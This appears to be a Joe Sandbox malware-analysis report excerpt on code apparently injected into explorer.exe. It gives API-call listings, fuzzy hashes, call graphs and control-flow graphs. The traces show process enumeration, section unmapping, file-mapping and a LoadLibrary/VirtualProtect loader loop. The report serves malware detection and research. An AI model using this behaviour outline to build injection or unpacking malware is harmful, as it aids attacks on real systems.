                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                  • String ID:
                                  • API String ID: 3827878703-0
                                  • Opcode ID: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                  • Instruction ID: 882ca4903ef036f6b5f5890f1cff92f57d062729b07f76d901994030c3102d93
                                  • Opcode Fuzzy Hash: c883a228e3cd8c0f3b6ac679db0de883e7e7543f6decbc1dddab91cca32b2512
                                  • Instruction Fuzzy Hash: 8731AF71744616AFCB68DF29D885BA6B7ECBF15314F14412CE8C6C7200E736E846CBA0
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(0008582C), ref: 00081839
                                  • lstrlenW.KERNEL32 ref: 00081845
                                  • RtlLeaveCriticalSection.NTDLL(0008582C), ref: 000818A9
                                  • Sleep.KERNEL32(00007530), ref: 000818B4
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                  • String ID:
                                  • API String ID: 2134730579-0
                                  • Opcode ID: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                  • Instruction ID: 7c053be448574412fdc363f5d5491aaf5b64503bb00f6c028054f82ac53ad905
                                  • Opcode Fuzzy Hash: 5cbea68060061c901a5a0e18475aadbda6a888a7652cd2638bdcb0b59724cb21
                                  • Instruction Fuzzy Hash: 9201DB70510900EBE314B765EC1A5BE3EA9FF817017100028F0C19B262DE388D01DFA6
                                  APIs
                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000811DD), ref: 000826DB
                                  • IsWow64Process.KERNEL32(000000FF,?), ref: 000826ED
                                  • IsWow64Process.KERNEL32(00000000,?), ref: 00082700
                                  • CloseHandle.KERNEL32(00000000), ref: 00082716
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process$Wow64$CloseHandleOpen
                                  • String ID:
                                  • API String ID: 331459951-0
                                  • Opcode ID: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                  • Instruction ID: 630fcc8948f4ad9a4a54ff0f26d7f5e2b88293ccb917313e272e05edaa6f4c2a
                                  • Opcode Fuzzy Hash: 79b6175c5be02008a79da4eab10be01ab7fd1a4829f266d8b305891cd8ccbd8b
                                  • Instruction Fuzzy Hash: D0F0BE72806218FFAB20DFA1AD888EEBBBCFF05751B10026AE94093140D7358F009BA1
                                  APIs
                                    • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                    • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                  • GetLocalTime.KERNEL32(?,00000000), ref: 000817F3
                                  • wsprintfW.USER32 ref: 0008181D
                                  Strings
                                  • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00081817
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.617972094.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                  • API String ID: 377395780-613334611
                                  • Opcode ID: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                  • Instruction ID: 471151813494080dcc102fe0f31ea5f83efc4e699d331606ea4c247a43dc96ce
                                  • Opcode Fuzzy Hash: 5b73c2eba3edcd7b7b3f1df71a82bd217a1d956ed1b7e119d7e59eb5ecba6627
                                  • Instruction Fuzzy Hash: B4F03072900128BADB14ABD99C458FFB2FCFF0CB02B00018AFA81E1181F67C5A50D3B5

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_0006B007 1 Function_00061D04 2 Function_00062A04 25 Function_00062918 2->25 44 Function_000627C4 2->44 66 Function_00061C6C 2->66 3 Function_00061405 4 Function_0006AD00 5 Function_00062580 6 Function_00061F00 7 Function_00061000 8 Function_0006A881 9 Function_0006428F 10 Function_0006370C 10->10 32 Function_000631AC 10->32 42 Function_00061838 10->42 43 Function_000634C4 10->43 10->66 11 Function_0006188C 11->42 12 Function_00061F0C 13 Function_0006AC8D 14 Function_00061508 15 Function_00061A88 16 Function_00062D14 21 Function_00061E1C 16->21 40 Function_000624B8 16->40 16->42 63 Function_00061860 16->63 71 Function_000618E8 16->71 17 Function_00063394 17->15 22 Function_00061E9C 17->22 17->42 55 Function_000618D0 17->55 17->63 17->71 80 Function_00061EF8 17->80 18 Function_00061B10 19 Function_0006B291 20 Function_0006AB9C 21->42 23 Function_0006141D 24 Function_00064298 26 Function_00061D24 27 Function_00061822 28 Function_000627A0 29 Function_00061CAC 30 Function_000620AC 30->15 31 Function_00062E2C 31->11 45 Function_00062DC0 31->45 31->63 32->18 34 Function_000625A8 32->34 32->42 53 Function_00061D54 32->53 32->63 79 Function_000626F8 32->79 33 Function_0006B4A8 68 Function_0006B46A 33->68 34->5 34->55 70 Function_00062768 34->70 35 Function_000614B2 36 Function_0006AAB0 37 Function_0006B2BE 37->33 38 Function_000619BC 39 Function_00062FBC 39->31 40->42 40->63 75 Function_000620F4 40->75 41 Function_00061938 41->42 41->63 43->1 43->2 43->15 43->17 43->26 43->29 43->38 43->42 47 Function_00061C4C 43->47 43->63 43->66 77 Function_00061BF8 43->77 45->42 46 Function_0006ABCF 48 Function_0006C14A 49 Function_0006B148 50 Function_0006ABD7 51 Function_00061254 52 Function_000614D4 54 Function_0006AAD2 56 Function_0006B2DF 57 Function_00061FDC 57->42 78 Function_000618F8 57->78 58 Function_0006B15B 59 Function_0006B358 59->33 60 Function_00063158 61 Function_00062664 62 Function_0006AFE3 63->66 64 Function_00061560 65 Function_0006156C 67 Function_0006ADEA 69 Function_0006A8E8 70->28 72 Function_00063068 72->31 72->41 72->42 72->63 72->66 73 Function_0006AFF6 74 Function_00061576 75->11 75->12 75->30 75->38 75->42 75->55 75->57 75->63 75->78 76 Function_00061EFA 79->5 79->61 79->66 81 Function_000614F9 82 Function_00065579

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 113 6370c-6371c call 61c6c 116 63722-63754 call 61838 113->116 117 637b0-637b5 113->117 121 63756-6375b call 61838 116->121 122 63785-637aa NtUnmapViewOfSection 116->122 124 63760-63779 121->124 126 637bc-637cb call 634c4 122->126 127 637ac-637ae 122->127 124->122 133 637d5-637de 126->133 134 637cd-637d0 call 6370c 126->134 127->117 128 637b6-637bb call 631ac 127->128 128->126 134->133
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL ref: 0006378C
                                  Memory Dump Source
                                  • Source File: 0000001E.00000002.617965683.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_30_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                  • Instruction ID: 6f86dcd5657ea9ef3a129f1321056eeef28fe10e10ecd7700be2daa8a1f1615e
                                  • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                  • Instruction Fuzzy Hash: 9611C8746069094FFB6CFBB8989D3B533D3FB14312F544029E815C72A2DE398A818740

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00061BF8: OpenFileMappingA.KERNEL32 ref: 00061C0F
                                    • Part of subcall function 00061BF8: MapViewOfFile.KERNEL32 ref: 00061C2E
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 000635B7
                                  • Process32First.KERNEL32 ref: 000635DA
                                  • lstrcmpi.KERNEL32 ref: 0006360C
                                  • Process32Next.KERNEL32 ref: 000636CD
                                  • CloseHandle.KERNELBASE ref: 000636DE
                                  • SysFreeMap.PGOCR ref: 000636F7
                                  • SleepEx.KERNEL32 ref: 00063701
                                  Memory Dump Source
                                  • Source File: 0000001E.00000002.617965683.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_30_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                  • String ID:
                                  • API String ID: 3402289966-0
                                  • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                  • Instruction ID: e861ec5d46096bab29741ff2dd44a154c76200efb4f374e95dae1c26c01eb10d
                                  • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                  • Instruction Fuzzy Hash: 68517730218A089FDB59FF68D8996EA73E3EB94310F444619F45BC72A2DF78DA0587C1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 54 6b4a8-6b4ab 55 6b4b5-6b4b9 54->55 56 6b4c5 55->56 57 6b4bb-6b4c3 55->57 58 6b4c7 56->58 59 6b4ad-6b4b3 56->59 57->56 60 6b4ca-6b4d1 58->60 59->55 62 6b4d3-6b4db 60->62 63 6b4dd 60->63 62->63 63->60 64 6b4df-6b4e2 63->64 65 6b4f7-6b504 64->65 66 6b4e4-6b4f2 64->66 76 6b506-6b508 65->76 77 6b51e-6b52c call 6b46a 65->77 67 6b4f4-6b4f5 66->67 68 6b52e-6b549 66->68 67->65 69 6b57a-6b57d 68->69 71 6b582-6b589 69->71 72 6b57f-6b580 69->72 75 6b58f-6b593 71->75 74 6b561-6b565 72->74 78 6b567-6b56a 74->78 79 6b54b-6b54e 74->79 80 6b595-6b5ae LoadLibraryA 75->80 81 6b5f0-6b5f9 75->81 83 6b50b-6b512 76->83 77->55 78->71 84 6b56c-6b570 78->84 79->71 82 6b550 79->82 87 6b5af-6b5b6 80->87 85 6b5fc-6b605 81->85 89 6b551-6b555 82->89 103 6b514-6b51a 83->103 104 6b51c 83->104 84->89 90 6b572-6b579 84->90 91 6b607-6b609 85->91 92 6b62a-6b67a VirtualProtect * 2 85->92 87->75 88 6b5b8 87->88 94 6b5c4-6b5cc 88->94 95 6b5ba-6b5c2 88->95 89->74 96 6b557-6b559 89->96 90->69 98 6b61c-6b628 91->98 99 6b60b-6b61a 91->99 100 6b67e-6b683 92->100 101 6b5ce-6b5da 94->101 95->101 96->74 102 6b55b-6b55f 96->102 98->99 99->85 100->100 105 6b685-6b694 100->105 108 6b5e5-6b5ef 101->108 109 6b5dc-6b5e3 101->109 102->74 102->78 103->104 104->77 104->83 109->87
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 0006B5A7
                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006B651
                                  • VirtualProtect.KERNELBASE ref: 0006B66F
                                  Memory Dump Source
                                  • Source File: 0000001E.00000002.617965683.000000000006A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_30_2_6a000_explorer.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$LibraryLoad
                                  • String ID:
                                  • API String ID: 895956442-0
                                  • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                  • Instruction ID: de7da5a6e30cfdee21bae1f1aab1ff707d31be70e42097908793e0bf60735bc1
                                  • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                  • Instruction Fuzzy Hash: C1514772758D1D4BCB24AA7C9C843F8B7D3FB55325B58062AD49BC3285EB58C9C68381

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 110 61bf8-61c18 OpenFileMappingA 111 61c1a-61c38 MapViewOfFile 110->111 112 61c3b-61c48 110->112 111->112
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001E.00000002.617965683.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_30_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: File$MappingOpenView
                                  • String ID:
                                  • API String ID: 3439327939-0
                                  • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                  • Instruction ID: 3bcaf25acfd1f49024d9787d5b89c15f37bef9fb8d047487d34edab0d4ccc7e8
                                  • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                  • Instruction Fuzzy Hash: 0FF01234314F4D4FEB45EF7C9C9C135B7E1EBA8202744857A985AC6165EF34C8458711